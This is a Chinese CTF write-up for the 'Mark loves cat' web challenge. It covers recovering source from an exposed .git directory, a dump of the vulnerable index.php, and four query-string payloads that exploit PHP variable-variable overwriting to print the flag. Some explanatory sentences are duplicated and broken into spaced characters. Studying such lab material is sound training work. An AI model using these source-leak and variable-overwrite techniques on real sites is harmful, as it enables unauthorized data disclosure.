BUUCTF WEB [BJDCTF2020]Mark loves cat
-
源代码中没有发现漏洞,使用dirsearch扫描,发现.gti泄露
-
使用scrabble
./scrabble http://70f9aaf8-036c-44f0-b1f1-df263f120cfa.node4.buuoj.cn:81/ -
得到flag.php和index.php文件
flag.php
<?php $flag = file_get_contents('/flag');index.php
<!DOCTYPE html> <html lang="zxx"> <head> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1"> <title>Home</title> <!--bootstrap Css--> <link href="assets/css/bootstrap.min.css" rel="stylesheet"> <!--ico font Css--> <link href="assets/css/font-awesome.min.css" rel="stylesheet"> <!-- magnific-popup Css--> <link href="assets/css/magnific-popup.css" rel="stylesheet"> <!--lineProgressbar Css--> <link href="assets/css/jquery.lineProgressbar.css" rel="stylesheet"> <!--owl.carousel Css--> <link href="assets/css/owl.carousel.css" rel="stylesheet"> <!--Slick Nav Css--> <link href="assets/css/slicknav.min.css" rel="stylesheet"> <!--Animate Css--> <link href="assets/css/animate.css" rel="stylesheet"> <!--Style Css--> <link href="assets/css/style.css" rel="stylesheet"> <!--Responsive Css--> <link href="assets/css/responsive.css" rel="stylesheet"> </head> <body> <!--nav section start--> <nav class="nav-area"> <div class="container"> <div class="row"> <div class="col-md-2"> <a href="#" class="logo"><img src="assets/img/logo.png" alt="logo image"></a> </div> <div class="col-md-10"> <ul id="main-menu"> <li><a href="#home">Home</a></li> <li><a href="#about">About</a></li> <li><a href="#resume">Resume</a></li> <li><a href="#service">Service</a></li> <li><a href="#work">Work</a></li> <li><a href="#clients-section">Testimonial</a></li> <li><a href="#blog">Blog</a></li> <li><a href="#contact">Contact</a></li> </ul> </div> </div> </div> </nav> <!--nav section end--> <!--header section start--> <header class="header-area header-bg" id="home"> <div class="header-inner"> <span>Welcome</span> <h1>I Am Mark Stev</h1> <h6>Web Developer , web designer</h6> <div class="scroll-down"> <span></span> </div> </div> </header> <!--header section end--> <!--about section start--> <section class="about-area" id="about"> <div class="container"> <div class="row"> <div class="col-md-6"> <img src="assets/img/profile-pic.jpg" alt="profile picture"> </div> <div class="col-md-6"> <div class="section-title inner"> <h2>About Me</h2> <p>Lorem ipsum dolor sit amet, consectetur adipisicing elit. Voluptatem quas error modi quaerat sequi, debitis!</p> </div> <ul> <li><label>Full Name :</label> Mark Stev</li> <li><label>Age :</label> 23</li> <li><label>Address :</label> Berlin, Germany</li> <li><label>Email :</label> mark@example.com</li> <li><label>Phone :</label> 111 222 333</li> <li><label>Skype :</label> Mark-333</li> <li><label>Job :</label> Grapich Designer</li> <li><label>Freelancer :</label> available</li> </ul> <a hrf="#" class="boxed-btn">Hire</a> <a href="#" class="boxed-btn">My work</a> </div> </div> </div> </section> <!--about section end--> <!--skill section start--> <section class="skill-section"> <div class="container"> <div class="row"> <div class="col-md-6 col-md-offset-3 text-center"> <div class="section-title main"> <h2>My Skill</h2> <p>Lorem ipsum dolor sit amet, consectetur adipisicing elit. Voluptatem quas error modi quaerat sequi, debitis!</p> </div> </div> </div> <div class="row text-center"> <div class="col-md-3 col-sm-6"> <div id="circle-1"></div> <h4 class="text-uppercase">Photoshop</h4> </div> <div class="col-md-3 col-sm-6"> <div id="circle-2"></div> <h4 class="text-uppercase">Illustrator</h4> </div> <div class="col-md-3 col-sm-6"> <div id="circle-3"></div> <h4 class="text-uppercase">Html</h4> </div> <div class="col-md-3 col-sm-6"> <div id="circle-4"></div> <h4 class="text-uppercase">Css</h4> </div> </div> </div> </section> <!--skill section end--> <!-- resome section start --> <section class="resome-area" id="resume"> <div class="container"> <div class="row"> <div class="col-md-6 col-md-offset-3 text-center"> <div class="section-title main"> <h2>Education & Experience</h2> <p>Lorem ipsum dolor sit amet, consectetur adipisicing elit. Voluptatem quas error modi quaerat sequi, debitis!</p> </div> </div> </div> <div class="row"> <div class="col-md-6 col-sm-12"> <div class="education-details"> <div class="icon"> <i class="fa fa-briefcase"></i> </div> <div class="single-education-list"> <h4>MERIN LAND COLLEGE</h4> <span class="duration">2012 - 2014</span> <p>Lorem ipsum dolor sit amet, consectetur adipisicing elit. Vitae, consectetur.</p> </div> <div class="single-education-list"> <h4>MERIN LAND COLLEGE</h4> <span class="duration">2012 - 2014</span> <p>Lorem ipsum dolor sit amet, consectetur adipisicing elit. Vitae, consectetur.</p> </div> <div class="single-education-list"> <h4>MERIN LAND COLLEGE</h4> <span class="duration">2012 - 2014</span> <p>Lorem ipsum dolor sit amet, consectetur adipisicing elit. Vitae, consectetur.</p> </div> </div> </div> <div class="col-md-6 col-sm-12"> <div class="working-details"> <div class="icon"> <i class="fa fa-book"></i> </div> <div class="single-education-list"> <h4>MERIN LAND COLLEGE</h4> <span class="duration">2012 - 2014</span> <p>Lorem ipsum dolor sit amet, consectetur adipisicing elit. Vitae, consectetur.</p> </div> <div class="single-education-list"> <h4>MERIN LAND COLLEGE</h4> <span class="duration">2012 - 2014</span> <p>Lorem ipsum dolor sit amet, consectetur adipisicing elit. Vitae, consectetur.</p> </div> <div class="single-education-list"> <h4>MERIN LAND COLLEGE</h4> <span class="duration">2012 - 2014</span> <p>Lorem ipsum dolor sit amet, consectetur adipisicing elit. Vitae, consectetur.</p> </div> </div> </div> <div class="col-md-12 text-center"> <a href="#" class="boxed-btn">Download Resome</a> </div> </div> </div> </section> <!-- resome section end --> <!--service section start--> <section class="service-section" id="service"> <div class="container"> <div class="row"> <div class="col-md-6 col-md-offset-3 text-center"> <div class="section-title main"> <h2>My Daily Service</h2> <p>Lorem ipsum dolor sit amet, consectetur adipisicing elit. Voluptatem quas error modi quaerat sequi, debitis!</p> </div> </div> </div> <div class="service-inner"> <div class="row"> <div class="col-md-4 col-sm-6"> <div class="single-service-box"> <div class="icon"> <img src="assets/img/service-1.png" alt="service icon"> </div> <h4>Design</h4> <p>Lorem ipsum dolor sit amet, consectetur adipisicing elit. At, nisi?</p> </div> </div> <div class="col-md-4 col-sm-6"> <div class="single-service-box"> <div class="icon"> <img src="assets/img/service-2.png" alt="service icon"> </div> <h4>DEVELOPMENT</h4> <p>Lorem ipsum dolor sit amet, consectetur adipisicing elit. At, nisi?</p> </div> </div> <div class="col-md-4 col-sm-6"> <div class="single-service-box"> <div class="icon"> <img src="assets/img/service-3.png" alt="service icon"> </div> <h4>BRANDING</h4> <p>Lorem ipsum dolor sit amet, consectetur adipisicing elit. At, nisi?</p> </div> </div> <div class="col-md-4 col-sm-6"> <div class="single-service-box"> <div class="icon"> <img src="assets/img/service-4.png" alt="service icon"> </div> <h4>MARKETING</h4> <p>Lorem ipsum dolor sit amet, consectetur adipisicing elit. At, nisi?</p> </div> </div> <div class="col-md-4 col-sm-6"> <div class="single-service-box"> <div class="icon"> <img src="assets/img/service-5.png" alt="service icon"> </div> <h4>SUPPORT</h4> <p>Lorem ipsum dolor sit amet, consectetur adipisicing elit. At, nisi?</p> </div> </div> <div class="col-md-4 col-sm-6"> <div class="single-service-box"> <div class="icon"> <img src="assets/img/service-6.png" alt="service icon"> </div> <h4>CONSULTING</h4> <p>Lorem ipsum dolor sit amet, consectetur adipisicing elit. At, nisi?</p> </div> </div> </div> </div> </div> </section> <!--service section end--> <!--my team section start--> <section class="team-area"> <div class="container"> <div class="row"> <div class="col-md-6 col-md-offset-3 text-center"> <div class="section-title main"> <h2>My Team Members</h2> <p>Lorem ipsum dolor sit amet, consectetur adipisicing elit. Voluptatem quas error modi quaerat sequi, debitis!</p> </div> </div> </div> <div class="row"> <div class="col-md-3 col-sm-6"> <div class="single-team-box"> <div class="team-member-thumb"> <img src="assets/img/team-1.png" alt=" team member picture"> </div> <div class="content"> <h4>Jhon Doue</h4> <span class="prosition">Web Designer</span> <ul class="social-links"> <li><a href="#"><i class="fa fa-facebook"></i></a></li> <li><a href="#"><i class="fa fa-google-plus"></i></a></li> <li><a href="#"><i class="fa fa-linkedin"></i></a></li> <li><a href="#"><i class="fa fa-twitter"></i></a></li> </ul> </div></div> </div> <div class="col-md-3 col-sm-6"> <div class="single-team-box"> <div class="team-member-thumb"> <img src="assets/img/team-2.png" alt=" team member picture"> </div> <div class="content"> <h4>Jhon Doue</h4> <span class="prosition">Web Designer</span> <ul class="social-links"> <li><a href="#"><i class="fa fa-facebook"></i></a></li> <li><a href="#"><i class="fa fa-google-plus"></i></a></li> <li><a href="#"><i class="fa fa-linkedin"></i></a></li> <li><a href="#"><i class="fa fa-twitter"></i></a></li> </ul> </div> </div> </div> <div class="col-md-3 col-sm-6"> <div class="single-team-box"> <div class="team-member-thumb"> <img src="assets/img/team-4.png" alt=" team member picture"> </div> <div class="content"> <h4>Jhon Doue</h4> <span class="prosition">Web Designer</span> <ul class="social-links"> <li><a href="#"><i class="fa fa-facebook"></i></a></li> <li><a href="#"><i class="fa fa-google-plus"></i></a></li> <li><a href="#"><i class="fa fa-linkedin"></i></a></li> <li><a href="#"><i class="fa fa-twitter"></i></a></li> </ul> </div> </div> </div> <div class="col-md-3 col-sm-6"> <div class="single-team-box"> <div class="team-member-thumb"> <img src="assets/img/team-3.png" alt=" team member picture"> </div> <div class="content"> <h4>Jhon Doue</h4> <span class="prosition">Web Designer</span> <ul class="social-links"> <li><a href="#"><i class="fa fa-facebook"></i></a></li> <li><a href="#"><i class="fa fa-google-plus"></i></a></li> <li><a href="#"><i class="fa fa-linkedin"></i></a></li> <li><a href="#"><i class="fa fa-twitter"></i></a></li> </ul> </div> </div> </div> </div> </div> </section> <!--my team section end--> <div class="counter-section"> <!-- counter section start --> <div class="container"> <div class="row"> <div class="col-md-12 text-center text-uppercase"> <ul> <li> <div class="single-counter-item"> <div class="icon"> <img src="assets/img/project.png" alt="project done image"> </div> <span class="counter-number"> 2350 </span> <h4>Project Done</h4> </div> </li> <li> <div class="single-counter-item"> <div class="icon"> <img src="assets/img/like.png" alt="like image"> </div> <span class="counter-number"> 2350 </span> <h4>Happy Clients</h4> </div> </li> <li> <div class="single-counter-item"> <div class="icon"> <img src="assets/img/coffe-cup.png" alt=" coffe cup"> </div> <span class="counter-number"> 2350 </span> <h4>Cups Of Coffee</h4> </div> </li> <li> <div class="single-counter-item"> <div class="icon"> <img src="assets/img/photo-taken.png" alt=""> </div> <span class="counter-number"> 2350 </span> <h4>Photos Taken</h4> </div> </li> </ul> </div> </div> </div> </div><!-- counter section end --> <!--portfolio section start--> <section class="portfolio-area" id="work"> <div class="container"> <div class="row"> <div class="col-md-6 col-md-offset-3 text-center"> <div class="section-title main"> <h2>Some Of My Work</h2> <p>Lorem ipsum dolor sit amet, consectetur adipisicing elit. Voluptatem quas error modi quaerat sequi, debitis!</p> </div> </div> </div> <div class="row"> <div class="col-md-12 text-center"> <ul class="porfolio-menu"> <li data-filter="*" class="active">All</li> <li data-filter=".design">Web Design</li> <li data-filter=".development">Web Development</li> <li data-filter=".photography">Photography</li> </ul> </div> <div class="col-md-12 text-center"> <div class="portolio-masonary"> <div class="single-porfolio-item grid-size design"> <div class="img-thumb"> <img src="assets/img/portfolio-1.jpg" alt=" portfolio image "> <div class="hover"> <div class="icon"> <a href="assets/img/portfolio-1.jpg" class="image-popup" title="Portfolio image"> <i class="fa fa-search-plus" aria-hidden="true"></i> </a> </div> <div class="icon"> <i class="fa fa-link" aria-hidden="true"></i> </div> </div> </div> </div> <div class="single-porfolio-item grid-size design"> <div class="img-thumb"> <img src="assets/img/portfolio-2.jpg" alt=" portfolio image "> <div class="hover"> <div class="icon"> <a href="assets/img/portfolio-2.jpg" class="image-popup" title="Portfolio image"> <i class="fa fa-search-plus" aria-hidden="true"></i> </a> </div> <div class="icon"> <i class="fa fa-link" aria-hidden="true"></i> </div> </div> </div> </div> <div class="single-porfolio-item grid-size development"> <div class="img-thumb"> <img src="assets/img/portfolio-3.jpg" alt=" portfolio image "> <div class="hover"> <div class="icon"> <a href="assets/img/portfolio-3.jpg" class="image-popup" title="Portfolio image"> <i class="fa fa-search-plus" aria-hidden="true"></i> </a> </div> <div class="icon"> <i class="fa fa-link" aria-hidden="true"></i> </div> </div> </div> </div> <div class="single-porfolio-item grid-size development "> <div class="img-thumb"> <img src="assets/img/portfolio-4.jpg" alt=" portfolio image "> <div class="hover"> <div class="icon"> <a href="assets/img/portfolio-4.jpg" class="image-popup" title="Portfolio image"> <i class="fa fa-search-plus" aria-hidden="true"></i> </a> </div> <div class="icon"> <i class="fa fa-link" aria-hidden="true"></i> </div> </div> </div> </div> <div class="single-porfolio-item grid-size photography"> <div class="img-thumb"> <img src="assets/img/portfolio-5.jpg" alt=" portfolio image "> <div class="hover"> <div class="icon"> <a href="assets/img/portfolio-5.jpg" class="image-popup" title="Portfolio image"> <i class="fa fa-search-plus" aria-hidden="true"></i> </a> </div> <div class="icon"> <i class="fa fa-link" aria-hidden="true"></i> </div> </div> </div> </div> <div class="single-porfolio-item grid-size photography"> <div class="img-thumb"> <img src="assets/img/portfolio-6.jpg" alt=" portfolio image "> <div class="hover"> <div class="icon"> <a href="assets/img/portfolio-5.jpg" class="image-popup" title="Portfolio image"> <i class="fa fa-search-plus" aria-hidden="true"></i> </a> </div> <div class="icon"> <i class="fa fa-link" aria-hidden="true"></i> </div> </div> </div> </div> </div> </div> </div> </div> </section> <!--portfolio section end--> <!-- testimonial section start--> <div class="testimonial-section" id="clients-section"> <div class="container"> <div class="row"> <div class="col-md-6 col-md-offset-3 text-center"> <div class="section-title main"> <h2>My Clients Says</h2> <p>Lorem ipsum dolor sit amet, consectetur adipisicing elit. Voluptatem quas error modi quaerat sequi, debitis!</p> </div> </div> </div> <div class="row"> <div class="col-md-12"> <div id="testimonial-slider"> <div class="testimonial"> <div class="testimonial-content"> <div class="testimonial-icon"> <i class="fa fa-quote-left"></i> </div> <p class="description"> Lorem ipsum dolor sit amet, consectetur adipiscing elit. Praesent bibendum dolor sit amet eros imperdiet, sit amet hendrerit nisi vehicula. </p> </div> <div class="clients-thumb"> <img src="assets/img/clients-1.jpg" alt="clients picture"> </div> <h3 class="title">Sara smith</h3> <span class="post">Seo Expert</span> </div> <div class="testimonial"> <div class="testimonial-content"> <div class="testimonial-icon"> <i class="fa fa-quote-left"></i> </div> <p class="description"> Lorem ipsum dolor sit amet, consectetur adipiscing elit. Praesent bibendum dolor sit amet eros imperdiet, sit amet hendrerit nisi vehicula. </p> </div> <div class="clients-thumb"> <img src="assets/img/clients-3.jpg" alt="clients picture"> </div> <h3 class="title">williamson</h3> <span class="post">Web Designer</span> </div> <div class="testimonial"> <div class="testimonial-content"> <div class="testimonial-icon"> <i class="fa fa-quote-left"></i> </div> <p class="description"> Lorem ipsum dolor sit amet, consectetur adipiscing elit. Praesent bibendum dolor sit amet eros imperdiet, sit amet hendrerit nisi vehicula. </p> </div> <div class="clients-thumb"> <img src="assets/img/clients-4.jpg" alt="clients picture"> </div> <h3 class="title">Kristina </h3> <span class="post">Web Developer</span> </div> </div> </div> </div> </div> </div> <!-- testimonial section end--> <!-- blog section start--> <section class="blog-area" id="blog"> <div class="container"> <div class="row"> <div class="col-md-6 col-md-offset-3 text-center"> <div class="section-title main"> <h2>My Blog</h2> <p>Lorem ipsum dolor sit amet, consectetur adipisicing elit. Voluptatem quas error modi quaerat sequi, debitis!</p> </div> </div> </div> <div class="row"> <div class="col-md-4 col-sm-6"> <div class="single-blog-post"> <div class="post-thumb"> <img src="assets/img/blog-1.jpg" alt=" blog image"> </div> <h4>STANdard POST WITH IMAGE</h4> <ul class="post-meta"> <li><i class="fa fa-clock-o"></i> 05 Jan 2018</li> <li><i class="fa fa-user"></i> By <a href="#">Admin</a></li> <li><i class="fa fa-comments"></i> 27</li> </ul> <p>Lorem ipsum dolor sit amet, consectetur adipisicing elit. Labore, excepturi modi eius a vel accusamus!</p> <a href="#" class="boxed-btn">Read More</a> </div> </div> <div class="col-md-4 col-sm-6"> <div class="single-blog-post"> <div class="post-thumb"> <img src="assets/img/blog-2.jpg" alt=" blog image"> </div> <h4>STANdard POST WITH IMAGE</h4> <ul class="post-meta"> <li><i class="fa fa-clock-o"></i> 05 Jan 2018</li> <li><i class="fa fa-user"></i> By <a href="#">Admin</a></li> <li><i class="fa fa-comments"></i> 27</li> </ul> <p>Lorem ipsum dolor sit amet, consectetur adipisicing elit. Labore, excepturi modi eius a vel accusamus!</p> <a href="#" class="boxed-btn">Read More</a> </div> </div> <div class="col-md-4 col-sm-6"> <div class="single-blog-post"> <div class="post-thumb"> <img src="assets/img/blog-3.jpg" alt=" blog image"> </div> <h4>STANdard POST WITH IMAGE</h4> <ul class="post-meta"> <li><i class="fa fa-clock-o"></i> 05 Jan 2018</li> <li><i class="fa fa-user"></i> By <a href="#">Admin</a></li> <li><i class="fa fa-comments"></i> 27</li> </ul> <p>Lorem ipsum dolor sit amet, consectetur adipisicing elit. Labore, excepturi modi eius a vel accusamus!</p> <a href="#" class="boxed-btn">Read More</a> </div> </div> </div> </div> </section> <!-- blog section end--> <!--contact section start--> <section class="contact-area" id="contact"> <div class="container"> <div class="row"> <div class="col-md-6 col-md-offset-3 text-center"> <div class="section-title main"> <h2>Contact Me</h2> <p>Lorem ipsum dolor sit amet, consectetur adipisicing elit. Voluptatem quas error modi quaerat sequi, debitis!</p> </div> </div> </div> <div class="row"> <div class="col-md-4 col-sm-12"> <div class="single-contact-box"> <div class="icon"> <img src="assets/img/contact-icon-2.png" alt="contact icon"> </div> <h4>Email</h4> <p>contact@mark.com</p> </div> <div class="single-contact-box"> <div class="icon"> <img src="assets/img/contact-icon-1.png" alt="contact icon"> </div> <h4>Location</h4> <p>3481 Melrose Place, Los Angeles</p> </div> <div class="single-contact-box"> <div class="icon"> <img src="assets/img/contact-icon-3.png" alt="contact icon"> </div> <h4>Phone</h4> <p>+ 000-111-222</p> </div> </div> <div class="col-md-8 col-sm-12"> <div class="contact-form-wrapper"> <form action="index.html"> <div class="row"> <div class="col-md-6 col-sm-12"> <input type="text" placeholder="Enter Name"> </div> <div class="col-md-6 col-sm-12"> <input type="email" placeholder="Enter Email"> </div> <div class="col-md-12"> <input type="text" placeholder="Enter Sujbect"> <textarea name="message" id="message" cols="30" rows="10" placeholder="Meassage"></textarea> <input type="submit" value="Send Message" class="boxed-btn"> </div> </div> </form> </div> </div> </div> </div> </section> <!--contact section end--> <!--footer area start--> <footer class="footer-area"> <div class="container"> <div class="row"> <div class="col-md-6 col-md-offset-3 text-center"> <ul class="social-area"> <li><a href="#"><i class="fa fa-facebook"></i></a></li> <li><a href="#"><i class="fa fa-twitter"></i></a></li> <li><a href="#"><i class="fa fa-instagram"></i></a></li> <li><a href="#"><i class="fa fa-linkedin"></i></a></li> <li><a href="#"><i class="fa fa-google-plus"></i></a></li> <li><a href="#"><i class="fa fa-dribbble"></i></a></li> </ul> </div> </div> </div> </footer> <!--footer area end--> <!--prealoader start--> <div class="preloader"> <div class="preloader-inner"> <div class="cssload-box-loading"></div> </div> </div> <!--prealoader end--> <!--go to top start--> <span class="go-top"><i class="fa fa-angle-double-up"></i></span> <!--go to top end--> <!--jquery script load--> <script src="assets/js/jquery.js"></script> <!--Isotope script load--> <script src="assets/js/isotope.pkgd.js"></script> <!-- magnific popup script load--> <script src="assets/js/jquery.magnific-popup.js"></script> <!--way point script load--> <script src="assets/js/waypoints.min.js"></script> <!--line progress bar script load--> <script src="assets/js/circle-progress.min.js"></script> <!-- counter up script load--> <script src="assets/js/typed.js"></script> <!-- typed script load--> <script src="assets/js/jquery.counterup.min.js"></script> <!--Owl carousel script load--> <script src="assets/js/owl.carousel.min.js"></script> <!--Image load script --> <script src="assets/js/imagesloaded.pkgd.js"></script> <!--Bootstrap v3 script load here--> <script src="assets/js/bootstrap.min.js"></script> <!--Slick Nav Js File Load--> <script src="assets/js/jquery.slicknav.min.js"></script> <!--Wow Js File Load--> <script src="assets/js/wow.min.js"></script> <!--Wow Js File Load--> <script src="assets/js/scrollspy.js"></script> <!--Main js file load--> <script src="assets/js/main.js"></script> </body> </html> <?php include 'flag.php'; $yds = "dog"; $is = "cat"; $handsome = 'yds'; foreach($_POST as $x => $y){ $$x = $y; } foreach($_GET as $x => $y){ $$x = $$y; } foreach($_GET as $x => $y){ if($_GET['flag'] === $x && $x !== 'flag'){ exit($handsome); } } if(!isset($_GET['flag']) && !isset($_POST['flag'])){ exit($yds); } if($_POST['flag'] === 'flag' || $_GET['flag'] === 'flag'){ exit($is); } echo "the flag is: ".$flag; -
index.php中主要的php代码
<?php include 'flag.php'; $yds = "dog"; $is = "cat"; $handsome = 'yds'; foreach($_POST as $x => $y){ $$x = $y; } foreach($_GET as $x => $y){ $$x = $$y; } foreach($_GET as $x => $y){ if($_GET['flag'] === $x && $x !== 'flag'){ exit($handsome); } } if(!isset($_GET['flag']) && !isset($_POST['flag'])){ exit($yds); } if($_POST['flag'] === 'flag' || $_GET['flag'] === 'flag'){ exit($is); } echo "the flag is: ".$flag; -
解法1
?handsome=flag&flag=foo&foo=flag利用GET方式传参
foreach($_GET as $x => $y){ $$x = $$y; }修改后
$handsome=$flag; $flag=$foo; $foo=$flag;在这个循环中
foreach($_GET as $x => $y){ if($_GET['flag'] === $x && $x !== 'flag'){ exit($handsome); } }当判断到
foo=flag时进入if,然后利用exit输出flag -
解法2
/?yds=flag利用GET方式传参
foreach($_GET as $x => $y){ $$x = $$y; }在这个foreach循环中覆盖 y d s 变 量 , 让 它 的 值 为 f l a g . p h p 中 的 yds变量,让它的值为flag.php中的 yds变量,让它的值为flag.php中的flag变量的值,然后利用
if(!isset($_GET['flag']) && !isset($_POST['flag'])){ exit($yds); }输出flag
-
解法3
?is=flag&flag=flag利用GET方式传参
foreach($_GET as $x => $y){ $$x = $$y; }覆盖 i s 变 量 , 同 时 不 改 变 is变量,同时不改变 is变量,同时不改变flag变量(若使用POST方式传flag=flag会改变$flag变量的值),然后利用
if($_POST['flag'] === 'flag' || $_GET['flag'] === 'flag'){ exit($is); }输出flag
-
解法4
?1=flag&flag=1绕过前面的三个if,使用最后的echo输出flag
注意:
foreach($_GET as $x => $y){ if($_GET['flag'] === $x && $x !== 'flag'){ exit($handsome); } }这个循环使用了强类型比较, G E T [ ′ f l a g ′ ] 得 到 的 1 是 S t r i n g , _GET['flag']得到的1是String, GET[′flag′]得到的1是String,x得到的1是int,从而绕过过滤。